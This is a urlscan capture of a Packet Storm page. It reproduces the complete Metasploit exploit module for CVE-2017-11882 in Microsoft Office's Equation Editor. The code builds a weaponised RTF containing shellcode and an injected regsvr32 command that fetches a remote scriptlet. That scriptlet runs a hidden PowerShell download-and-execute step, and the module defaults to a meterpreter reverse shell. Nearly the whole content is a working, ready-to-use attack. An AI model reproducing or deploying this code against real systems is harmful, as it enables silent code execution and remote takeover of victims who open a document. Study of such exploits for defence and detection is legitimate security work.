packetstormsecurity.com
Open in
urlscan Pro
198.84.60.198
Public Scan
URL:
https://packetstormsecurity.com/files/145226/Microsoft-Office-Equation-Editor-Code-Execution.html
Submission: On April 22 via api from US — Scanned from DE
Submission: On April 22 via api from US — Scanned from DE
Form analysis 2 forms found in the DOM
GET /search/
<form method="get" action="/search/"><input type="text" name="q" id="q" maxlength="120" value="Search …"><button type="submit"></button>
<div id="q-tabs"><label for="s-files" class="on">Files</label><label for="s-news">News</label><label for="s-users">Users</label><label for="s-authors">Authors</label><input type="radio" value="files" name="s" id="s-files"><input type="radio"
value="news" name="s" id="s-news"><input type="radio" value="users" name="s" id="s-users"><input type="radio" value="authors" name="s" id="s-authors"></div>
</form>GET /files/cal/
<form id="cal" action="/files/cal/" method="get">
<h2>File Archive:</h2>
<h3>April 2024</h3>
<button id="cal-prev" name="cal-prev" type="button" value="2024-4"><span><</span></button>
<ul class="dotw">
<li>Su</li>
<li>Mo</li>
<li>Tu</li>
<li>We</li>
<li>Th</li>
<li>Fr</li>
<li>Sa</li>
</ul>
<ul>
<li></li>
<li class="low"><a href="/files/date/2024-04-01/">1</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 1st</div>
<div class="count">10 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-02/">2</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 2nd</div>
<div class="count">26 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-03/">3</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 3rd</div>
<div class="count">40 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-04/">4</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 4th</div>
<div class="count">6 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-05/">5</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 5th</div>
<div class="count">26 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-06/">6</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 6th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-04-07/">7</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 7th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-08/">8</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 8th</div>
<div class="count">22 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-09/">9</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 9th</div>
<div class="count">14 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-10/">10</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 10th</div>
<div class="count">10 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-11/">11</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 11th</div>
<div class="count">13 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-12/">12</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 12th</div>
<div class="count">14 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-13/">13</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 13th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-04-14/">14</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 14th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-15/">15</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 15th</div>
<div class="count">30 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-04-16/">16</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 16th</div>
<div class="count">10 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-17/">17</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 17th</div>
<div class="count">22 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-04-18/">18</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 18th</div>
<div class="count">45 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-19/">19</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 19th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-20/">20</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 20th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-04-21/">21</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 21st</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none today"><a href="/files/date/2024-04-22/">22</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 22nd</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-23/">23</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 23rd</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-24/">24</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 24th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-25/">25</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 25th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-26/">26</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 26th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-27/">27</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 27th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-04-28/">28</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 28th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-29/">29</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 29th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-04-30/">30</a>
<div class="stats">
<div class="point"></div>
<div class="date">Apr 30th</div>
<div class="count">0 Files</div>
</div>
</li>
<li></li>
<li></li>
<li></li>
<li></li>
</ul>
</form>Text Content
exploit the possibilities
Register | Login
FilesNewsUsersAuthors
Home Files News &[SERVICES_TAB]About Contact Add New
MICROSOFT OFFICE EQUATION EDITOR CODE EXECUTION
Microsoft Office Equation Editor Code Execution Posted Dec 6, 2017 Authored by
embedi, Mumbai | Site metasploit.com
This Metasploit module exploits a flaw in how the Equation Editor handles OLE
objects in memory to execute arbitrary code using RTF files without interaction.
tags | exploit, arbitrary advisories | CVE-2017-11882 SHA-256 |
16ad4379e6651e3ce0e9433a9c32d2a5e70809affcfd3f999c329227ce6dbc46 Download |
Favorite | View
Related Files
SHARE THIS
*
*
* LinkedIn
* Reddit
* Digg
* StumbleUpon
MICROSOFT OFFICE EQUATION EDITOR CODE EXECUTION
Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Office CVE-2017-11882',
'Description' => %q{
Module exploits a flaw in how the Equation Editor that
allows an attacker to execute arbitrary code in RTF files without
interaction. The vulnerability is caused by the Equation Editor,
to which fails to properly handle OLE objects in memory.
},
'Author' => ['mumbai', 'embedi'],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Nov 15 2017',
'References' => [
['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],
['URL', 'https://github.com/embedi/CVE-2017-11882']
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
['Microsoft Office', {} ],
],
'DefaultTarget' => 0,
'Payload' => {
'DisableNops' => true
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
}
))
register_options([
OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]),
OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil])
])
end
def retrieve_header(filename)
if (not datastore['FOLDER_PATH'].nil?)
path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}"
else
path = nil
end
if (not path.nil?)
if ::File.file?(path)
File.open(path, 'rb') do |fd|
header = fd.read(fd.stat.size).split('{\*\datastore').first
header = header.to_s # otherwise I get nil class...
print_status("Injecting #{path}...")
return header
end
else
header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
end
else
header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
end
return header
end
def generate_rtf
header = retrieve_header(datastore['FILENAME'])
object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
object_class << '09000600000000000000000000000100000001000000000000000010000002000'
object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
object_class << '07400720079000000000000000000000000000000000000000000000000000000'
object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
object_class << '00000000000000000000000000000000000000000000000000000000000000003'
object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
object_class << "00000300040000000000000000000000000000000000000000000000000000000"
object_class << "000000000000000000000000000000000000000000000000000000000000000\n"
shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0
shellcode << "\x00\x00" # 2: 00 00 add BYTE PTR [eax],al
shellcode << "\x02\x00" # 4: 02 00 add al,BYTE PTR [eax]
shellcode << "\x9e" # 6: 9e sahf
shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]
shellcode << "\x00\x00" # d: 00 00 add BYTE PTR [eax],al
shellcode << "\x00\xc8" # f: 00 c8 add al,cl
shellcode << "\xa7" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]
shellcode << "\\" # 12: 5c pop esp
shellcode << "\x00\xc4" # 13: 00 c4 add ah,al
shellcode << "\xee" # 15: ee out dx,al
shellcode << "[" # 16: 5b pop ebx
shellcode << "\x00\x00" # 17: 00 00 add BYTE PTR [eax],al
shellcode << "\x00\x00" # 19: 00 00 add BYTE PTR [eax],al
shellcode << "\x00\x03" # 1b: 00 03 add BYTE PTR [ebx],al
shellcode << "\x01\x01" # 1d: 01 01 add DWORD PTR [ecx],eax
shellcode << "\x03\n" # 1f: 03 0a add ecx,DWORD PTR [edx]
shellcode << "\n\x01" # 21: 0a 01 or al,BYTE PTR [ecx]
shellcode << "\x08ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl
shellcode << "\xB8\x44\xEB\x71\x12" # 26: b8 44 eb 71 12 mov eax,0x1271eb44
shellcode << "\xBA\x78\x56\x34\x12" # 2b: ba 78 56 34 12 mov edx,0x12345678
shellcode << "\x31\xD0" # 30: 31 d0 xor eax,edx
shellcode << "\x8B\x08" # 32: 8b 08 mov ecx,DWORD PTR [eax]
shellcode << "\x8B\x09" # 34: 8b 09 mov ecx,DWORD PTR [ecx]
shellcode << "\x8B\x09" # 36: 8b 09 mov ecx,DWORD PTR [ecx]
shellcode << "\x66\x83\xC1\x3C" # 38: 66 83 c1 3c add cx,0x3c
shellcode << "\x31\xDB" # 3c: 31 db xor ebx,ebx
shellcode << "\x53" # 3e: 53 push ebx
shellcode << "\x51" # 3f: 51 push ecx
shellcode << "\xBE\x64\x3E\x72\x12" # 40: be 64 3e 72 12 mov esi,0x12723e64
shellcode << "\x31\xD6" # 45: 31 d6 xor esi,edx
shellcode << "\xFF\x16" # 47: ff 16 call DWORD PTR [esi]
shellcode << "\x53" # 49: 53 push ebx
shellcode << "\x66\x83\xEE\x4C" # 4a: 66 83 ee 4c sub si,0x4c
shellcode << "\xFF\x10" # 4e: ff 10 call DWORD PTR [eax]
shellcode << "\x90" # 50: 90 nop
shellcode << "\x90" # 50: 90 nop
footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'
footer << '00000000000000000000000000000000000000000000000000000'
footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'
footer << '00000000000000000000000000000000000000000000000000000000000000400'
footer << '0000C5000000000000000000000000000000000000000000000000'
footer << '0000000000000000000000000000000000000000000000000000000000000000'
footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'
footer << '000000000000000000000000000000000000000000000000000000'
footer << '0000000000000000000000000000000000000000000000000000000000000000'
footer << '000000000000000000000000000000000000000000000000000000'
footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'
footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'
footer << '00000000000000000000000000000000000000000000000000000000000000000'
footer << '00000000000000000000000000000000000000000000000000000'
footer << '00000000000000000000000000000000000000000000000000000000000000000'
footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'
footer << '00000000000000000000000000000000000000000000000000000000000000000'
footer << '00000000000000001050000050000000D0000004D45544146494C'
footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'
footer << '500000002001C0000000000050000000902000000000500000002'
footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'
footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'
footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'
footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'
footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'
footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'
footer << '00030000000000' + "\n"
footer << '}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260' + "\n"
footer << "0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\n"
footer << "0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\n"
footer << "1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\n"
footer << "0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\n"
footer << "0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\n"
footer << "002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\n"
footer << "000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\n"
footer << "0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\n"
footer << "00000000\n"
footer << "}}}\n"
footer << '\par}' + "\n"
payload = shellcode
payload += [0x00402114].pack("V")
payload += "\x00" * 2
payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
payload = header + object_class + payload + footer
payload
end
def gen_psh(url, *method)
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
if method.include? 'string'
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
else
# Random filename to use, if there isn't anything set
random = "#{rand_text_alphanumeric 8}.exe"
# Set filename (Use random filename if empty)
filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
# Set path (Use %TEMP% if empty)
path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
# Join Path and Filename
file = %Q(echo (#{path}+'\\#{filename}'))
# Generate download PowerShell command
download_string = Rex::Powershell::PshMethods.download_run(url, file)
end
download_and_run = "#{ignore_cert}#{download_string}"
# Generate main PowerShell command
return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
end
def on_request_uri(cli, _request)
if _request.raw_uri =~ /\.sct$/
print_status("Handling request for .sct from #{cli.peerhost}")
payload = gen_psh("#{get_uri}", "string")
data = gen_sct_file(payload)
send_response(cli, data, 'Content-Type' => 'text/plain')
else
print_status("Delivering payload to #{cli.peerhost}...")
p = regenerate_payload(cli)
data = cmd_psh_payload(p.encoded,
payload_instance.arch.first,
remove_comspec: true,
exec_in_place: true
)
send_response(cli, data, 'Content-Type' => 'application/octet-stream')
end
end
def rand_class_id
"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
end
def gen_sct_file(command)
# If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).
if command == ''
return %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"></registration></scriptlet>}
# If a command is provided, tell the target system to execute it.
else
return %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
end
end
def primer
file_create(generate_rtf)
end
end
Login or Register to add favorites
* Follow us on Twitter
* Follow us on Facebook
* Subscribe to an RSS Feed
FILE ARCHIVE:
APRIL 2024
<
* Su
* Mo
* Tu
* We
* Th
* Fr
* Sa
*
* 1
Apr 1st
10 Files
* 2
Apr 2nd
26 Files
* 3
Apr 3rd
40 Files
* 4
Apr 4th
6 Files
* 5
Apr 5th
26 Files
* 6
Apr 6th
0 Files
* 7
Apr 7th
0 Files
* 8
Apr 8th
22 Files
* 9
Apr 9th
14 Files
* 10
Apr 10th
10 Files
* 11
Apr 11th
13 Files
* 12
Apr 12th
14 Files
* 13
Apr 13th
0 Files
* 14
Apr 14th
0 Files
* 15
Apr 15th
30 Files
* 16
Apr 16th
10 Files
* 17
Apr 17th
22 Files
* 18
Apr 18th
45 Files
* 19
Apr 19th
0 Files
* 20
Apr 20th
0 Files
* 21
Apr 21st
0 Files
* 22
Apr 22nd
0 Files
* 23
Apr 23rd
0 Files
* 24
Apr 24th
0 Files
* 25
Apr 25th
0 Files
* 26
Apr 26th
0 Files
* 27
Apr 27th
0 Files
* 28
Apr 28th
0 Files
* 29
Apr 29th
0 Files
* 30
Apr 30th
0 Files
*
*
*
*
TOP AUTHORS IN LAST 30 DAYS
* Red Hat 172 files
* Ubuntu 47 files
* Debian 22 files
* LiquidWorm 11 files
* Valentin Lobstein 11 files
* nu11secur1ty 8 files
* Apple 6 files
* Google Security Research 5 files
* tmrswrr 4 files
* E1.Coders 4 files
FILE TAGS
* ActiveX (933)
* Advisory (84,828)
* Arbitrary (16,656)
* BBS (2,859)
* Bypass (1,832)
* CGI (1,032)
* Code Execution (7,633)
* Conference (689)
* Cracker (844)
* CSRF (3,373)
* DoS (24,569)
* Encryption (2,383)
* Exploit (52,830)
* File Inclusion (4,253)
* File Upload (986)
* Firewall (822)
* Info Disclosure (2,849)
* Intrusion Detection (906)
* Java (3,121)
* JavaScript (890)
* Kernel (7,018)
* Local (14,713)
* Magazine (586)
* Overflow (13,048)
* Perl (1,430)
* PHP (5,199)
* Proof of Concept (2,368)
* Protocol (3,695)
* Python (1,600)
* Remote (31,425)
* Root (3,618)
* Rootkit (523)
* Ruby (619)
* Scanner (1,650)
* Security Tool (7,981)
* Shell (3,252)
* Shellcode (1,217)
* Sniffer (900)
* Spoof (2,258)
* SQL Injection (16,538)
* TCP (2,424)
* Trojan (689)
* UDP (897)
* Virus (669)
* Vulnerability (32,598)
* Web (9,877)
* Whitepaper (3,773)
* x86 (967)
* XSS (18,177)
* Other
FILE ARCHIVES
* April 2024
* March 2024
* February 2024
* January 2024
* December 2023
* November 2023
* October 2023
* September 2023
* August 2023
* July 2023
* June 2023
* May 2023
* Older
SYSTEMS
* AIX (429)
* Apple (2,078)
* BSD (376)
* CentOS (58)
* Cisco (1,927)
* Debian (7,014)
* Fedora (1,693)
* FreeBSD (1,246)
* Gentoo (4,467)
* HPUX (880)
* iOS (373)
* iPhone (108)
* IRIX (220)
* Juniper (69)
* Linux (49,227)
* Mac OS X (691)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (488)
* RedHat (15,501)
* Slackware (941)
* Solaris (1,611)
* SUSE (1,444)
* Ubuntu (9,439)
* UNIX (9,391)
* UnixWare (187)
* Windows (6,649)
* Other
© 2022 Packet Storm. All rights reserved.
Site Links News by Month News Tags Files by Month File Tags File Directory
About Us History & Purpose Contact Information Terms of Service Privacy
Statement Copyright Information
Services Security Services Hosting By Rokasec
* Follow us on Twitter
* Follow us on Facebook
* Subscribe to an RSS Feed